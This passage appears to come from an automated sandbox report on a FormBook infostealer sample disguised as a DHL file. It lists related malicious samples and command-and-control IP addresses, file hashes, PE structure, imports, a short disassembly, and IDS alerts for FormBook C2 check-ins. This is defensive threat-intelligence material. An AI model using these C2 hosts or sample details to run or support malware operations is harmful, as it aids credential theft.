| DHL 745-12302024.exe | malicious | FormBook | 195.110.124.133
| DHL 806-232024.exe | malicious | FormBook | 195.110.124.133
| DHL 0737-12182024.exe | malicious | FormBook | 195.110.124.133
| DHL 073412182024.exe | malicious | FormBook | 195.110.124.133
| DHL 40312052024.exe | malicious | FormBook | 195.110.124.133
| DHL 30312052024.exe | malicious | FormBook | 195.110.124.133
| SRT68.exe | malicious | FormBook | 195.110.124.133
| CCE 30411252024.exe | malicious | FormBook | 195.110.124.133
| ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW | DHL 8350232025-1.exe | malicious | FormBook | 116.50.37.244
| DHL 745-12302024.exe | malicious | FormBook | 116.50.37.244
| DHL 806-232024.exe | malicious | FormBook | 116.50.37.244
| DHL 0737-12182024.exe | malicious | FormBook | 116.50.37.244
| DHL 073412182024.exe | malicious | FormBook | 116.50.37.244
| x86_64.elf | malicious | Mirai, Moobot | 101.0.232.112
| mpsl.elf | malicious | Mirai, Moobot | 119.15.228.125
| DHL 40312052024.exe | malicious | FormBook | 116.50.37.244
| DHL 30312052024.exe | malicious | FormBook | 116.50.37.244
| CCE 30411252024.exe | malicious | FormBook | 116.50.37.244
SEDO-ASDE | DHL 8350232025-1.exe | malicious | FormBook | 91.195.240.94
| DHL 745-12302024.exe | malicious | FormBook | 91.195.240.94
| DHL 806-232024.exe | malicious | FormBook | 91.195.240.94
| DHL 0737-12182024.exe | malicious | FormBook | 91.195.240.94
| DHL 073412182024.exe | malicious | FormBook | 91.195.240.94
| 236236236.elf | malicious | Unknown | 91.195.240.94
| DHL 40312052024.exe | malicious | FormBook | 91.195.240.94
| DHL 30312052024.exe | malicious | FormBook | 91.195.240.94
| CCE 30411252024.exe | malicious | FormBook | 91.195.240.94
| Certificate 11-18720.exe | malicious | FormBook | 91.195.240.94
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                    Category:dropped
                                                                                    Size (bytes):196608
                                                                                    Entropy (8bit):1.121297215059106
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.99346522941898
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:CL7t2RVbXJRsOHtKhGeS2QAGXz417GY2C8Gl13oB6LwC:S7t275KNadXz417G1C8sMC
                                                                                    MD5:0B926B86EEF6F68EB2C06BAD0279A063
                                                                                    SHA1:274138A283CD4532256147C3BD8695C93720278F
                                                                                    SHA-256:17E6D34828E79EA551993C58F0433F928C7635B409234D021156473B42BA29D5
                                                                                    SHA-512:209F19BF1976FEDF0CE393D6BDF9670D5986C01AC29172A8DC6F4770387F982A4BE4B2B824AFE08EE8E7F580B33F001D977DE7A0ACF3C33AB3D814E793428CFD
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.389924888043252
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:rDHL8350232025-2.exe
                                                                                    File size:1'563'136 bytes
                                                                                    MD5:6f732c7020a0eba292610a19133b3178
                                                                                    SHA1:f2ea127e9532671903a402a896269f8cd44308ed
                                                                                    SHA256:0fcc36b8e2936fa3fcbc8b618a9033832eb9a833dacd014fc2849c953ac8b7e2
                                                                                    SHA512:682e008e8cd34023383d9136d3ac20205af4c5e5109114efed104568e57547f772af106cd19fa15096923541b38f43808e6c2c44817bb24fc1f64de2e989abe1
                                                                                    SSDEEP:24576:cqDEvCTbMWu7rQYlBQcBiT6rprG8ahd14KGmlCgsk2jRbrR9ZiBRPgHWWFcru/05:cTvC/MTQYxsWR7ahdezdbNiBRPgH0ru
                                                                                    TLSH:E375D0027381C022FF9B92734B9AF7515BBC69260123E62F13981DB9BD705B1563E7A3
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x677C8A43 [Tue Jan 7 01:58:27 2025 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                    Instruction
                                                                                    call 00007FE2DD138353h
                                                                                    jmp 00007FE2DD137C5Fh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FE2DD137E3Dh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007FE2DD137E0Ah
                                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                    mov eax, ecx
                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    and dword ptr [eax], 00000000h
                                                                                    and dword ptr [eax+04h], 00000000h
                                                                                    push eax
                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                    add eax, 04h
                                                                                    push eax
                                                                                    call 00007FE2DD13A9FDh
                                                                                    pop ecx
                                                                                    pop ecx
                                                                                    mov eax, esi
                                                                                    pop esi
                                                                                    pop ebp
                                                                                    retn 0004h
                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FE2DD13AA48h
                                                                                    pop ecx
                                                                                    ret
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    mov esi, ecx
                                                                                    lea eax, dword ptr [esi+04h]
                                                                                    mov dword ptr [esi], 0049FDD0h
                                                                                    push eax
                                                                                    call 00007FE2DD13AA31h
                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                    pop ecx
                                                                                    Programming Language:
                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xa6fc0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x17b000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xa6fc0 | 0xa7000 | 8c0d56d54a1373d382fa3dbb201e701f | False | 0.9610383724738024 | data | 7.958469511750788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x17b000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
| RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
| RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
| RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
| RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
| RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
| RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
| RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
| RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xdc7b8 | 0x9e286 | data | | | 1.000317992510196 |
| RT_GROUP_ICON | 0x17aa40 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
| RT_GROUP_ICON | 0x17aab8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x17aacc | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x17aae0 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x17aaf4 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x17abd0 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
| DLL | Import |
|---|---|
| WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
| WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile |
| USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW |
| USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient |
| GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW |
| SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-07T15:32:24.303849+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49736 | 154.215.72.110 | 80 | TCP |
| 2025-01-07T15:32:56.245059+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49933 | 116.50.37.244 | 80 | TCP |
| 2025-01-07T15:34:17.782006+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49984 | 85.159.66.93 | 80 | TCP |
| 2025-01-07T15:34:31.105080+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | TCP |
| 2025-01-07T15:34:52.926156+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | TCP |
| 2025-01-07T15:35:06.336026+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | TCP |
| 2025-01-07T15:35:35.872835+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
                                                                                    Jan 7, 2025 15:34:31.105079889 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.105133057 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.105206966 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.105206966 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.109899998 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.164707899 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.201948881 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.201961994 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202023029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202086926 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202090025 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202099085 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202133894 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202168941 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202179909 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202208996 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202827930 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202877045 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.202883959 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202898979 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202909946 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.202970982 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.203329086 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:31.203392029 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.207237005 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 7, 2025 15:34:31.212018967 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.583528042 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.588439941 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:44.588624001 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.592056990 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:44.596865892 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210248947 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210338116 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:45.210378885 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:46.103600979 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.124166012 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 7, 2025 15:34:47.129251003 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 7, 2025 15:34:47.130161047 CET4999080192.168.2.566.29.149.46
